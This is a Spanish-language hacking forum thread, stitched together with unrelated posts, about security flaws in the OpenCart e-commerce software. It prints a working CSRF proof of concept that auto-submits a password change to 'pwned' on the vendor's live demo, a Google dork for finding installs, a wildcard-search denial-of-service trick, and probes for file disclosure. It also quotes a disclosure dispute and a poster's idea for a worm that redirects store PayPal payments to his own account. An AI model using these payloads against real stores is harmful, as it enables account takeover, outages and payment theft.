Mensajes

yo pienso que es mejor hacer hilos de proceso a hacer procesos nuevos, se dispararían en mucho menor tiempo y ocuparían menos memoria.

porque no usas paypal y dejas que te hagan la conversion de forma automatica cuando pagues?

¿podrían solucionar sus diferencias en privado?

hay código de ejecución y es posible subirle una shell al demo oficial, mas adelante le haremos una auditoría similar a simpleaudit.
el que se quiera agregar por favor indiquenlo acá para añadirlos al proyecto en googlecode.

cuando baje de posicion el post lo voy a mover a nivel web.

ya se arregló y tienen LFI, path disclosure y file disclosure looooool

Fatal error: Class 'Controllerdownloaddownloadphp' not found in /home/opencart/public_html/opencart/system/engine/front.php  on line 44

:http://www.opencart.com/opencart/system/logs/error.txt

también se le puede dosear atraves del agotramiento de memoria agotando los recursos al servidor mysql con un ataque %%%
:http://demo.opencart.com/index.php?route=product/search&keyword=%25&category_id=0

se nota inmediatamente que su query es del tipo like '%$val%' asi que si insertamos un % quedará un lindo like '%%%' generando un select * sin limite lol

y bueno...

http://demo.opencart.com/index.php?route=module/cart/callback

POST /index.php?route=module/cart/callback HTTP/1.1
Host: demo.opencart.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.5pre) Gecko/20100514 Ubuntu/9.10 (karmic) Namoroka/3.6.5pre
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://demo.opencart.com/index.php?route=product/product&product_id=47
Content-Length: 122
Cookie: PHPSESSID=a239eb01c20087fdf8a19ec49929de66; language=en; currency=GBP
Pragma: no-cache
Cache-Control: no-cache

quantity=1&product_id=47&redirect=http%3A%2F%2Fdemo.opencart.com%2Findex.php%3Froute%3Dproduct%2Fproduct%26product_id%3D47

practicamente todo el sistema tiene CSRF x_x

Código (html4strict) [Seleccionar] Expandir

<html>
<body onload="document.forms[0].submit();">
<!--
Basic arbitrary password change in OpenCart <= 1.4.8
GoogleDork: "Powered by OpenCart"
Disclosure: http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
PoC: https://foro.elhacker.net/noticias/opencart_se_niega_a_arreglar_vulnerabilidades_y_sabotea_los_parches-t294544.0.html
Change password of any user to "pwned"
-->
<form method="post" action="http://demo.opencart.com/index.php?route=account/password">
<input type="hidden" name="password" value="pwned" />
<input type="hidden" name="confirm" value="pwned" />
</form>
</body>
</html>

lol, que es esto?
:http://www.opencart.com/index.php?route=documentation/documentation&path=\

además nunca un archivo que contenga código php y menos aun un theme debe ser visualizado directamente
:http://www.opencart.com/opencart/application/view/template/documentation/documentation.tpl

que tal si le incluyo alguna variable critica como alguna conexión hacia algún tipo de dato x?

tampoco es capaz de diferenciar entre un string y un array lol
:http://www.opencart.com/index.php?route[]=demonstration/demonstration

Notice: Array to string conversion in /home/opencart/public_html/opencart/system/engine/action.php  on line 10

¿que mas podría encontrar si tuviera el código fuente?

bueno, aprobechemos que ambos están ddoseados y apelemos al caché de google xD

http://webcache.googleusercontent.com/search?q=cache:GxNTLYTONrsJ:blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/+opencart&cd=8&hl=es&ct=clnk&gl=cl

————————————————–
    From: "Ben"
    Sent: Friday, January 22, 2010 8:06 PM
    To: < *******@opencart.com>
    Subject: OpenCart – Enquiry

    Hi,

    I recently installed OpenCart and I noticed that it is vulnerable to CSRF attacks. I have created a sample page that is capable of inserting a rouge user (the page currently prompts you but could be done silently if the attacker knows the url of the site).

    http://visionsource.org/*********.html

    Please let know that you are looking into the security issue and are going to release an update with a fix otherwise I will make the issue public.

    If you need any help fixing the problem please let me know.

    Thanks,
    Ben.
    ————————————————–
    On 2010-01-22, at 4:50 PM, Daniel Kerr wrote:

    Ben you seem to be very clever to come up with this. But! you need to be logged in for this to happen.

    ————————————————–
    From: "Ben Maynard"
    Sent: Friday, January 22, 2010 11:34 PM
    To: "Daniel Kerr"
    Subject: Re: OpenCart – Enquiry

    HI Daniel,

    That is the whole point of a CSRF attack. Please read http://en.wikipedia.org/wiki/Csrf for an explanation on the attack.

    This can be very dangerous, for example:

    I am an attacker looking at stealing money, I find a websites that are running opencart and have paypal as a payment method. I send the owner an email asking a question about a product and send a link that will perform the attack on the website. The chances of the owner being logged into their opencart admin is high since they are dealing with orders, and a rouge account is created without the user knowing (The attacker could just format the malicious page to look like a 404 not found page so it doesnt raise suspicion with the owner).

    The attacker makes the script send an email when the page is hit, so he knows when to logged into the admin section. The attacker then logs in, changes the paypal email address to his own account, deletes the new account to help cover his tracks. He starts to get the money from the website and the owner of the website may not realize what has happened for a couple of days (maybe even longer)!

    If someone was to do this, it would cause a major problem for the owner (and buyers who money was stolen).

    I have implemented a fix on the website i am working on and dont mind sharing the fix. I create a random token when the user logs in, and in the Url class I add it to the url. There is also a check on the user auth.

    Thanks,
    Ben.
    ————————————————–
    On 2010-01-22, at 7:31 PM, Daniel Kerr wrote:

    This sort of thing is down to the client. The software on a clients computer is nothing to do with opencart! There is no way that I'm responsible for a client being stupid enough to click links in emails.

    Even professional banking sites have trouble with the problem you describe.

    The only thing a client can take steps to do is only allowing certain IP's to access the admin via their hosting.

    ————————————————–
    From: "Ben Maynard"
    Sent: Saturday, January 23, 2010 12:52 AM
    To: "Daniel Kerr"
    Subject: Re: OpenCart – Enquiry

    A link in an email is not the only way for this attack to be performed, it was just an example. Its not hard to add protection and would make open cart more secure, security is not something you can take lightly.

    ————————————————–
    On 2010-01-22, at 8:05 PM, Daniel Kerr wrote:
    what protection do you recommend?
    ————————————————–
    On 2010-01-22, at 8:05 PM, Daniel Kerr wrote:
    to be honest this again is down to the client. not opencart.

    the security problem is very low. seriously how is some one going to trick some one into clicking a link to a site that will them display there own web site admin?

    your just wasting my time.

Daniel Kerr says:
February 2, 2010 at 3:39 am

The guy who sent me the email is an idiot. He seems to think he has found some great hack. the hack will not work unless the user is logged in and clicks a link that will redirect them to their own admin control panel.

#
Daniel Kerr says:
February 2, 2010 at 10:03 pm

There are many things a web store owner can do. such as rename their admin folder or restrict the ip's of who can login. but again this is down to the client to do.

any good anti virus would stop this sort of problem.

as for bens idea of adding tokens to the end of the urls. well i like the urls like they are.
#
Daniel Kerr says:
February 2, 2010 at 10:14 pm

to be honest. this just shows the type of person be is. he thinks hes found some big hack and when i tell him to to stop wasting my time he goes around posting my emails in forums and his blog. ben is a prat.

this sort of problem even today effects big sites like gmail, paypal. you really think everything is down to the person who writes the script? or the web user?

looooooooooool



hay cada genio desarrollando software con backdoor incluido, porque eso no es un bug, es un backdoor, cuando un desarrollador crea un software sabiendo la vulnerabilidad de su sistema sin hacer nada al respecto se llama backdoor.

Ahora dependiendo del CSRF por lo que yo estoy leyendo es posible acceder al panel de administración y modificar datos como pagos.
Ahora, si se pudiera encontrar un xss desde el panel de administración podría fabricarse fácilmente un worm atraves de xss redireccionando al atacado hacia el csrf propio cambiando masivamente los mails de pagos a mi cuenta paypal xDDDD

lol, o sea, ningún buén sistema de pago que yo sepa sufre de csrf que es un fallo de programación tan básico, incluso mas básico que un xss. ahora, si el desarrollador no sabe que es un csrf y como solucionarlo entonces está claro que no debe utilizarse bajo ningún motivo este software.

es, mas, por todo lo dicho y probado de su indiferencia a este problema de seguridad poría ser fácilmente demandado por cualquier empresa que utilize este software.

eso lo hace tu router

Que recomendamos? no usar OpenCart.

hacer exploits xDDDD

un antivirus no protege ante un ataque csrf

pd: el blog no funciona, el servidor no responde
pd2:lol, ahora me di cuenta que se terminaron ddoseando entre ellos xD

Y de paso, alguien sabe algo del APB Basic, ¡Dios!, he buscado eso por todo internet y no encuentro nada, absolutamente nada, es como si no existiera, es el programa que usamos para programar, (valga la redundancia), en el curso que estoy haciendo, lo quiero para practicar, es parecido a la consola de windows (cmd)

http://es.wikipedia.org/wiki/Lenguaje_de_programaci%C3%B3n_ABC

La programación ABC es el lenguaje orientado a una estructura con identación sin llaves como por ejemplo visual basic, python, delphi, basics, etc.